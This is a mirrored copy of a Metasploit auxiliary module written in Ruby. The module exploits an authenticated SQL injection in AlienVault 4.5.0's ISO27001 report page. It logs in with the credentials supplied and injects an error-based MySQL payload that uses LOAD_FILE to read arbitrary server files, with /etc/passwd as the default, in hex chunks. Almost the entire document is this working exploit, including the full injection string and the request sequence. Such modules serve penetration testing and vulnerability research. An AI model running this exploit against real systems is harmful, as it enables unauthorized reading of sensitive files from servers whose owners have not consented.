CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/alienvault_iso27001_sqli.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info={})

10
    super(update_info(info,

11
      'Name'           => "AlienVault Authenticated SQL Injection Arbitrary File Read",

12
      'Description'    => %q{

13
        AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG

14
        generation PHP file. This module exploits this to read an arbitrary file from

15
        the file system. Any authenticated user is able to exploit it, as administrator

16
        privileges aren't required.

17
      },

18
      'License'        => MSF_LICENSE,

19
      'Author'         =>

20
        [

21
          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module

22
        ],

23
      'References'     =>

24
        [

25
          ['EDB', '32644']

26
        ],

27
      'DefaultOptions'  =>

28
        {

29
          'SSL' => true

30
        },

31
      'Platform'       => ['linux'],

32
      'Privileged'     => false,

33
      'DisclosureDate' => '2014-03-30'))

34


35
      register_options(

36
      [

37
        Opt::RPORT(443),

38
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),

39
        OptString.new('USERNAME', [ true, 'Single username' ]),

40
        OptString.new('PASSWORD', [ true, 'Single password' ]),

41
        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])

42
      ])

43


44
  end

45


46
  def run

47


48
    print_status("Get a valid session cookie...")

49
    res = send_request_cgi({

50
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')

51
    })

52


53
    unless res and res.code == 200

54
      print_error("Server did not respond in an expected way")

55
      return

56
    end

57


58
    cookie = res.get_cookies

59


60
    if cookie.blank?

61
      print_error("Could not retrieve a cookie")

62
      return

63
    end

64


65
    post = {

66
      'embed' => '',

67
      'bookmark_string' => '',

68
      'user' => datastore['USERNAME'],

69
      'passu' => datastore['PASSWORD'],

70
      'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])

71
    }

72


73
    print_status("Login...")

74


75
    res = send_request_cgi({

76
      'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),

77
      'method' => 'POST',

78
      'vars_post' => post,

79
      'cookie' => cookie

80
    })

81


82
    unless res and res.code == 302

83
      print_error("Server did not respond in an expected way")

84
      return

85
    end

86


87
    unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')

88
      print_error("Authentication failed")

89
      return

90
    end

91


92
    cookie = res.get_cookies

93


94
    if cookie.blank?

95
      print_error("Could not retrieve the authenticated cookie")

96
      return

97
    end

98


99
    i = 0

100
    full = ''

101
    filename = datastore['FILEPATH'].unpack("H*")[0]

102
    left_marker = Rex::Text.rand_text_alpha(6)

103
    right_marker = Rex::Text.rand_text_alpha(6)

104


105
    print_status("Exploiting SQLi...")

106


107
    loop do

108
      file = sqli(left_marker, right_marker, i, cookie, filename)

109
      return if file.nil?

110
      break if file.empty?

111


112
      str = [file].pack("H*")

113
      full << str

114
      vprint_status(str)

115


116
      i = i+1

117
    end

118


119
    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])

120
    print_good("File stored at path: " + path)

121
  end

122


123
  def sqli(left_marker, right_marker, i, cookie, filename)

124
    pay =  "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"

125
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"

126
    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"

127
    pay << " GROUP BY x)a) AND 'xnDa'='xnDa"

128


129
    get = {

130
      'date_from' => pay,

131
      'date_to' => '2014-03-30'

132
    }

133


134
    res = send_request_cgi({

135
      'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),

136
      'cookie' => cookie,

137
      'vars_get' => get

138
    })

139


140
    if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/

141
      return $1

142
    else

143
      print_error("Server did not respond in an expected way")

144
      return nil

145
    end

146
  end

147
end

148


149


150